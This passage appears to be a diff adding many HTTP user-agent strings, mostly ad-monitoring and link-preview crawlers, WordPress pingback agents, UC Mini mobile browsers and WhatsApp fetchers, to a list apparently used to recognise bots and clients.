x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623433436-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623435752-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623372917-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623382489-0 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd87yGQjWmVZXjJbO20Oa5LAxue6gGI) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623424136-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623434122-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623434121-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623436238-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +WordPress/5.4.1; https://agrupaglobal.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 5.0; DLI-TL20 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 8.0.0; SM-J727T1 ) U2/1.0.0 Mobile +WordPress/5.7.2; https://www.nouvelles-du-monde.com +WordPress/5.7.2; https://www.notiulti.com +WhatsApp/2.2121.7 N +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623461445-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1623469904-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623470607-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1623487527-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623491644-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623510338-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 5.1; LG-X230 ) U2/1.0.0 Mobile +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0; %lang_code%) adbeat.com/policy Gecko/20100101 Firefox/44.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +WordPress/5.7.2; http://podskajemvsem.ru +GoogleLoginService/1.3 (sugar-aums JDQ39),gzip(gfe),gzip(gfe) +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64 +WordPress/5.7; https://theoutdoortrip.com +python-requests/2.7.0 CPython/2.7.18 Windows/2012ServerR2 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623545284-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623545293-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623594406-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623545667-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623556068-0 +WhatsApp/2.21.12.17 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623562782-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623596266-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 5.0.2; SM-C111 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 5.1.1; GT-S5360 ) U2/1.0.0 Mobile +WordPress/5.7.2; https://besporovod.ru EWWW/615 +WordPress/5.3.4; https://xn--c1a8aza.xn--p1ai +WordPress/5.7.2; https://tonted.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623583672-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623583674-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623583676-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623584216-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623584218-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623584488-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623584489-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623583674-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623584489-10 +Apache-HttpClient/4.5.5 (Java/1.8.0_101) +p2/1.1.300.v20161004-0244 (Java 1.8.0_211-b12 Oracle Corporation; Windows10 10.0.0 x86-64; en_HK) org.eclipse.epp.package.jee.product/4.7.3.M20180301-0715 (org.eclipse.ui.ide.workbench) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623664799-0 +WordPress/5.7.2; https://topical.link +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623690695-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623697584-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623704025-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623704026-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623632697-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623641211-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623673279-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 5.1.1; SM-N900 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 4.4.2; AS-5433_Secret ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623665189-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623629166-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623637446-0 +Mozilla/5.0 (Linux; Android 11;SM-G9866N Build/PR1A.2007820.012; wv) AppleWebKit/537.36 (KHTML,linke Gecko) Version/4.0 Chrome/80.0.3987.163 Whale/1.0.0.0 Crosswalk/25.80.14.26 Mobile Safari/537.36 NAVER(inapp; search; 900; 11.2.5) +NetSurf/3.11 (RISC OS) +WordPress/5.7.2; https://www.gadybay.com +WhatsApp/2.21.13.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623789623-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623719139-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623726322-0 +WhatsApp/2.21.120.9 i +WhatsApp/2.21.110.14 i +WhatsApp/2.21.130.1 i +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 5.0; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.5.583 (SpeedMode; Proxy; Android 9; TECNO_KC6 ) U2/1.0.0 Mobile +NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0 (Java; U; MIDP-2.0; Pt-BR; NokiaC3-00) U2/1.0.0 UCBrowser/9.4.1.377 U2/1.0.0 Mobile UNTRUSTED/1.0 +WhatsApp/2.2123.7 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623804098-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623814753-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623829300-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 9; SM-G600FY ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623807111-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623816872-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Mobile Safari/537.36 PTST/210615.150508 +WhatsApp/2.21.11.18 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623848132-0 +WhatsApp/2.21.13.2 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623881143-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 PTST/210615.150508 +DuckDuckGo/0 CFNetwork/1220.1 Darwin/20.3.0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Mobile Safari/537.36 PTST/210616.175658 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 6.0; IdeaTabA1000-G ) U2/1.0.0 Mobile +WordPress/5.7.2; https://www.maccanismi.it +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623889083-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623899082-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623934316-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623941249-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623892854-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623902258-0 +WhatsApp/2.21.13.5 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1623962153-0 +python-httpx/0.17.1 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 PTST/210616.175658 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Mobile Safari/537.36 PTST/210617.181625 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 6.0.1; DLI-TL20 ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210618.150855 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623975224-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623985031-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) adbeat.com/policy Gecko/20100101 Firefox/89.0 +WordPress/5.3.2; https://www.fahrenheit-snippetsv1.ch +WordPress/4.7.21; http://projectfx/wordpress +WordPress/5.6.4; https://colomae.com +WhatsApp/2.21.13.3 A +WordPress/5.3.8; https://skoczeksiedlce.pl +WhatsApp/2.21.13.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624047779-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623977635-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1623989072-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210617.181625 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624037041-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624043314-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624049789-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 PTST/210617.181625 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210617.181625 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/91.0.4472.90Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1624006610-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1624006685-0 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf709-hrd) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 7.0; TA-1032 ) U2/1.0.0 Mobile +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210618.150855 +YOURLS v1.7.3 +http://yourls.org/ (running on https://s.coop) +WordPress/5.4.6; http://tommyweb2016.com; verifying pingback from 192.40.220.138 +WordPress/5.7.2; http://headerphile.com; verifying pingback from 192.40.220.138 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1624081554-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624103298-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624103297-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624065478-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624074585-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624106705-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624106706-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624121389-0 +WordPress/5.7.2; https://bytepeaker.com +WordPress/5.7.2; https://besporovod.ru EWWW/617.0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.2.962 (SpeedMode; Proxy; Android 6.0.1; SM-G532G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1624066707-0 +WordPress/5.7.2; https://mysabella.com.tr +GoogleAuth/1.4 (U520AS QP1A.190711.020); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624147721-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624179557-10 +WhatsApp/2.21.13.7 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624151571-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624158339-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) simplex-c4 +SonyEricssonJ108i/R7DA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0 UCWEB/2.0 (Java; U; MIDP-2.0; en-US; sonyericssonj108i) U2/1.0.0 UCBrowser/8.9.0.251 U2/1.0.0 Mobile +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/86.0.4240.75 Safari/537.36 +WordPress/5.7.2; https://www.bijiaodian.com +WordPress/5.0.2; https://www.radiotimeline.com; verifying pingback from 14.225.11.127 +WordPress/5.5.5; http://remmont.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624256084-10 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1624261559-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624290945-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624293978-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624293959-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624293994-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 6.0; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1624236372-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624236400-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624245797-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1624261547-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624282503-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624290799-0 +WhatsApp/2.21.13.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624298920-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624309349-0 +WordPress/5.7.2; https://www.crifort.cl +WordPress/5.7.2; https://et-code.ru +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1624351215-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 